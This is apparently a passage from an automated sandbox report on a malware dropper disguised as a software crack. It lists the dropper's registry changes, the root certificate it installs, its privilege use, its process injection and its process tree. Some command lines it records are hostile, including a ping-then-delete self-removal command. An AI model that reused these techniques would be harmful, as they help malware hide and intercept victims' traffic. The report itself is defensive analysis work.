MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000d000de3152dc3365d2150a2c6505306b9062349006c77461af25bb35bd650186999152fef949a3a8dc6cd4433954428c98d8eaeb5ab335e9054b MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{4633E100-4EB8-4134-9658-51171831169A} = "0" MicrosoftEdge.exe -
Processes:
Setup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe -
Runs ping.exe 1 TTPs 5 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 3916 PING.EXE 3572 PING.EXE 4156 PING.EXE 5276 PING.EXE 2304 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
SmartClock.exepid process 5528 SmartClock.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
WerFault.exe1613213258946.exe1613213263452.exe1613213268702.exemsiexec.exe23E04C4F32EF2158.tmpseed.exepid process 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4212 1613213258946.exe 4212 1613213258946.exe 4076 1613213263452.exe 4076 1613213263452.exe 68 1613213268702.exe 68 1613213268702.exe 2672 msiexec.exe 2672 msiexec.exe 708 23E04C4F32EF2158.tmp 708 23E04C4F32EF2158.tmp 4872 seed.exe 4872 seed.exe 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2640 -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 640 -
Suspicious behavior: MapViewOfSection 22 IoCs
Processes:
MicrosoftEdgeCP.exeseed.exeA89A.exeBCD0.exepid process 4520 MicrosoftEdgeCP.exe 4872 seed.exe 4320 A89A.exe 2376 BCD0.exe 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 2640 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 2600 msiexec.exe Token: SeIncreaseQuotaPrivilege 2600 msiexec.exe Token: SeSecurityPrivilege 2672 msiexec.exe Token: SeCreateTokenPrivilege 2600 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2600 msiexec.exe Token: SeLockMemoryPrivilege 2600 msiexec.exe Token: SeIncreaseQuotaPrivilege 2600 msiexec.exe Token: SeMachineAccountPrivilege 2600 msiexec.exe Token: SeTcbPrivilege 2600 msiexec.exe Token: SeSecurityPrivilege 2600 msiexec.exe Token: SeTakeOwnershipPrivilege 2600 msiexec.exe Token: SeLoadDriverPrivilege 2600 msiexec.exe Token: SeSystemProfilePrivilege 2600 msiexec.exe Token: SeSystemtimePrivilege 2600 msiexec.exe Token: SeProfSingleProcessPrivilege 2600 msiexec.exe Token: SeIncBasePriorityPrivilege 2600 msiexec.exe Token: SeCreatePagefilePrivilege 2600 msiexec.exe Token: SeCreatePermanentPrivilege 2600 msiexec.exe Token: SeBackupPrivilege 2600 msiexec.exe Token: SeRestorePrivilege 2600 msiexec.exe Token: SeShutdownPrivilege 2600 msiexec.exe Token: SeDebugPrivilege 2600 msiexec.exe Token: SeAuditPrivilege 2600 msiexec.exe Token: SeSystemEnvironmentPrivilege 2600 msiexec.exe Token: SeChangeNotifyPrivilege 2600 msiexec.exe Token: SeRemoteShutdownPrivilege 2600 msiexec.exe Token: SeUndockPrivilege 2600 msiexec.exe Token: SeSyncAgentPrivilege 2600 msiexec.exe Token: SeEnableDelegationPrivilege 2600 msiexec.exe Token: SeManageVolumePrivilege 2600 msiexec.exe Token: SeImpersonatePrivilege 2600 msiexec.exe Token: SeCreateGlobalPrivilege 2600 msiexec.exe Token: SeCreateTokenPrivilege 2600 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2600 msiexec.exe Token: SeLockMemoryPrivilege 2600 msiexec.exe Token: SeIncreaseQuotaPrivilege 2600 msiexec.exe Token: SeMachineAccountPrivilege 2600 msiexec.exe Token: SeTcbPrivilege 2600 msiexec.exe Token: SeSecurityPrivilege 2600 msiexec.exe Token: SeTakeOwnershipPrivilege 2600 msiexec.exe Token: SeLoadDriverPrivilege 2600 msiexec.exe Token: SeSystemProfilePrivilege 2600 msiexec.exe Token: SeSystemtimePrivilege 2600 msiexec.exe Token: SeProfSingleProcessPrivilege 2600 msiexec.exe Token: SeIncBasePriorityPrivilege 2600 msiexec.exe Token: SeCreatePagefilePrivilege 2600 msiexec.exe Token: SeCreatePermanentPrivilege 2600 msiexec.exe Token: SeBackupPrivilege 2600 msiexec.exe Token: SeRestorePrivilege 2600 msiexec.exe Token: SeShutdownPrivilege 2600 msiexec.exe Token: SeDebugPrivilege 2600 msiexec.exe Token: SeAuditPrivilege 2600 msiexec.exe Token: SeSystemEnvironmentPrivilege 2600 msiexec.exe Token: SeChangeNotifyPrivilege 2600 msiexec.exe Token: SeRemoteShutdownPrivilege 2600 msiexec.exe Token: SeUndockPrivilege 2600 msiexec.exe Token: SeSyncAgentPrivilege 2600 msiexec.exe Token: SeEnableDelegationPrivilege 2600 msiexec.exe Token: SeManageVolumePrivilege 2600 msiexec.exe Token: SeImpersonatePrivilege 2600 msiexec.exe Token: SeCreateGlobalPrivilege 2600 msiexec.exe Token: SeCreateTokenPrivilege 2600 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2600 msiexec.exe Token: SeLockMemoryPrivilege 2600 msiexec.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
msiexec.exe23E04C4F32EF2158.tmppid process 2600 msiexec.exe 708 23E04C4F32EF2158.tmp 2600 msiexec.exe -
Suspicious use of SetWindowsHookEx 18 IoCs
Processes:
Setup.exe6489A2274AE24900.exe6489A2274AE24900.exefirefox.exe1613213258946.exefirefox.exe1613213263452.exefirefox.exe1613213268702.exeThunderFW.exeMiniThunderPlatform.exe23E04C4F32EF2158.exe23E04C4F32EF2158.tmpseed.sfx.exeMicrosoftEdge.exeMicrosoftEdgeCP.exe4695.tmp.exepid process 1676 Setup.exe 672 6489A2274AE24900.exe 1500 6489A2274AE24900.exe 756 firefox.exe 4212 1613213258946.exe 3388 firefox.exe 4076 1613213263452.exe 932 firefox.exe 68 1613213268702.exe 4264 ThunderFW.exe 4996 MiniThunderPlatform.exe 4580 23E04C4F32EF2158.exe 708 23E04C4F32EF2158.tmp 3012 seed.sfx.exe 4364 MicrosoftEdge.exe 4520 MicrosoftEdgeCP.exe 4520 MicrosoftEdgeCP.exe 5248 4695.tmp.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2640 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
InterVations_RegCOPA_v1_crack.execmd.exekeygen-pr.exekeygen-step-4.exekey.exekeygen-step-3.execmd.exeSetup.exemsiexec.execmd.exe6489A2274AE24900.exe6489A2274AE24900.execmd.exedescription pid process target process PID 4764 wrote to memory of 3340 4764 InterVations_RegCOPA_v1_crack.exe cmd.exe PID 4764 wrote to memory of 3340 4764 InterVations_RegCOPA_v1_crack.exe cmd.exe PID 4764 wrote to memory of 3340 4764 InterVations_RegCOPA_v1_crack.exe cmd.exe PID 3340 wrote to memory of 4440 3340 cmd.exe keygen-pr.exe PID 3340 wrote to memory of 4440 3340 cmd.exe keygen-pr.exe PID 3340 wrote to memory of 4440 3340 cmd.exe keygen-pr.exe PID 3340 wrote to memory of 4448 3340 cmd.exe keygen-step-1.exe PID 3340 wrote to memory of 4448 3340 cmd.exe keygen-step-1.exe PID 3340 wrote to memory of 4448 3340 cmd.exe keygen-step-1.exe PID 3340 wrote to memory of 4052 3340 cmd.exe keygen-step-3.exe PID 3340 wrote to memory of 4052 3340 cmd.exe keygen-step-3.exe PID 3340 wrote to memory of 4052 3340 cmd.exe keygen-step-3.exe PID 3340 wrote to memory of 4044 3340 cmd.exe keygen-step-4.exe PID 3340 wrote to memory of 4044 3340 cmd.exe keygen-step-4.exe PID 3340 wrote to memory of 4044 3340 cmd.exe keygen-step-4.exe PID 4440 wrote to memory of 1436 4440 keygen-pr.exe key.exe PID 4440 wrote to memory of 1436 4440 keygen-pr.exe key.exe PID 4440 wrote to memory of 1436 4440 keygen-pr.exe key.exe PID 4044 wrote to memory of 1676 4044 keygen-step-4.exe Setup.exe PID 4044 wrote to memory of 1676 4044 keygen-step-4.exe Setup.exe PID 4044 wrote to memory of 1676 4044 keygen-step-4.exe Setup.exe PID 1436 wrote to memory of 1964 1436 key.exe key.exe PID 1436 wrote to memory of 1964 1436 key.exe key.exe PID 1436 wrote to memory of 1964 1436 key.exe key.exe PID 4052 wrote to memory of 8 4052 keygen-step-3.exe cmd.exe PID 4052 wrote to memory of 8 4052 keygen-step-3.exe cmd.exe PID 4052 wrote to memory of 8 4052 keygen-step-3.exe cmd.exe PID 8 wrote to memory of 2304 8 cmd.exe PING.EXE PID 8 wrote to memory of 2304 8 cmd.exe PING.EXE PID 8 wrote to memory of 2304 8 cmd.exe PING.EXE PID 1676 wrote to memory of 2600 1676 Setup.exe msiexec.exe PID 1676 wrote to memory of 2600 1676 Setup.exe msiexec.exe PID 1676 wrote to memory of 2600 1676 Setup.exe msiexec.exe PID 2672 wrote to memory of 4704 2672 msiexec.exe MsiExec.exe PID 2672 wrote to memory of 4704 2672 msiexec.exe MsiExec.exe PID 2672 wrote to memory of 4704 2672 msiexec.exe MsiExec.exe PID 1676 wrote to memory of 672 1676 Setup.exe 6489A2274AE24900.exe PID 1676 wrote to memory of 672 1676 Setup.exe 6489A2274AE24900.exe PID 1676 wrote to memory of 672 1676 Setup.exe 6489A2274AE24900.exe PID 1676 wrote to memory of 1500 1676 Setup.exe 6489A2274AE24900.exe PID 1676 wrote to memory of 1500 1676 Setup.exe 6489A2274AE24900.exe PID 1676 wrote to memory of 1500 1676 Setup.exe 6489A2274AE24900.exe PID 1676 wrote to memory of 4352 1676 Setup.exe cmd.exe PID 1676 wrote to memory of 4352 1676 Setup.exe cmd.exe PID 1676 wrote to memory of 4352 1676 Setup.exe cmd.exe PID 4044 wrote to memory of 4700 4044 keygen-step-4.exe md2_2efs.exe PID 4044 wrote to memory of 4700 4044 keygen-step-4.exe md2_2efs.exe PID 4044 wrote to memory of 4700 4044 keygen-step-4.exe md2_2efs.exe PID 4352 wrote to memory of 3916 4352 cmd.exe PING.EXE PID 4352 wrote to memory of 3916 4352 cmd.exe PING.EXE PID 4352 wrote to memory of 3916 4352 cmd.exe PING.EXE PID 1500 wrote to memory of 4852 1500 6489A2274AE24900.exe cmd.exe PID 1500 wrote to memory of 4852 1500 6489A2274AE24900.exe cmd.exe PID 1500 wrote to memory of 4852 1500 6489A2274AE24900.exe cmd.exe PID 672 wrote to memory of 756 672 6489A2274AE24900.exe firefox.exe PID 672 wrote to memory of 756 672 6489A2274AE24900.exe firefox.exe PID 672 wrote to memory of 756 672 6489A2274AE24900.exe firefox.exe PID 672 wrote to memory of 756 672 6489A2274AE24900.exe firefox.exe PID 672 wrote to memory of 756 672 6489A2274AE24900.exe firefox.exe PID 672 wrote to memory of 756 672 6489A2274AE24900.exe firefox.exe PID 4852 wrote to memory of 4172 4852 cmd.exe taskkill.exe PID 4852 wrote to memory of 4172 4852 cmd.exe taskkill.exe PID 4852 wrote to memory of 4172 4852 cmd.exe taskkill.exe PID 672 wrote to memory of 4212 672 6489A2274AE24900.exe 1613213258946.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\InterVations_RegCOPA_v1_crack.exe"C:\Users\Admin\AppData\Local\Temp\InterVations_RegCOPA_v1_crack.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp15⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
